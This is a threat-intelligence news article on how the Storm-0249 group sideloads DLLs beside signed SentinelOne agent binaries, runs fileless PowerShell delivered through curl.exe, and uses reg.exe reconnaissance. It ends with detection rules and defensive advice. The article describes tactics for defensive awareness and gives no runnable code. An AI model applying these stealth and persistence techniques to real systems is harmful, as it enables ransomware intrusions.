Invisible Ransomware: Storm-0249 Weaponizes SentinelOne EDR in Stealth Attacks
The financially motivated group Storm-0249, long known as a broker of initial access for ransomware operators, has markedly refined its tradecraft, triggering a new wave of alarm among cybersecurity professionals. Analysts at ReliaQuest have observed the group shifting away from broad phishing campaigns toward highly targeted intrusions that exploit trusted components of EDR platforms — most notably SentinelOne. This strategy enables attackers to disguise malicious activity as ordinary defensive operations and maintain persistence within victim environments for weeks as they prepare the ground for future ransomware deployments.
Where Storm-0249 once relied on mass phishing and simple loaders, its attack chains now feature spoofed Microsoft domains, fileless PowerShell execution, delivery of malicious code via curl.exe, and — above all — DLL sideloading adjacent to signed SentinelOne binaries. In one incident, the attackers deployed a fraudulent MSI package executed under SYSTEM privileges, which planted a tampered DLL beside the legitimate SentinelAgentWorker.exe. The EDR process then dutifully loaded the malicious library, under whose cover reconnaissance was conducted, telemetry was exfiltrated to attacker-controlled domains, and communication with command-and-control infrastructure was established.
Especially troubling is Storm-0249’s newfound ability to use EDR agents themselves as transport layers for covert commands and control channels. Microsoft Defender recorded instances in which the signed SentinelAgentWorker.exe contacted domains registered by the attackers mere weeks before the intrusion. Yet processes bearing trusted digital signatures rarely prompt scrutiny. Combined with TLS encryption, these channels become virtually invisible to conventional traffic-analysis systems.
The group also makes extensive use of legitimate Windows utilities such as reg.exe and findstr.exe to conduct reconnaissance, including the retrieval of MachineGuid — a parameter many ransomware families use to bind encryption keys to specific devices. By executing such commands under the guise of a signed EDR process, Storm-0249 disappears completely into the “noise” of normal system activity.
Researchers warn that the abuse of trusted processes raises the threat landscape to an entirely new tier. Standard remediation measures — reinstalling agents, updating endpoints — no longer suffice. MSI packages running with system-level privileges provide a durable foothold that survives most basic cleanup procedures. Furthermore, the techniques employed by the group can be easily adapted to other EDR solutions, making the issue systemic rather than product-specific.
ReliaQuest stresses that defeating Storm-0249 requires behavioral analytics, automated response capabilities, and deep monitoring of trusted processes. Their updated GreyMatter detection rules aim to surface atypical behavior: loading unsigned DLLs into AppData, PowerShell execution piped from curl.exe, connections to recently registered domains, suspicious registry operations, and persistence attempts. Automated playbooks for host isolation, domain blocking, and malicious hash suppression can reduce response time from hours to minutes and prevent ransomware deployment.
Experts broadly agree that Storm-0249’s tactics will become a catalyst for other groups in the IAB and RaaS ecosystems. The fusion of targeted intrusions, abuse of trusted processes, and durable persistence significantly accelerates the ransomware kill chain and narrows defenders’ window to detect and disrupt an attack. Organizations must therefore strengthen controls around PowerShell and curl.exe, enhance DNS-traffic monitoring, track anomalies in EDR-agent behavior, and respond immediately to any unusual network activity originating from trusted processes. Such measures become critically important when adversaries have learned to weaponize defensive systems as instruments of their own stealth.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
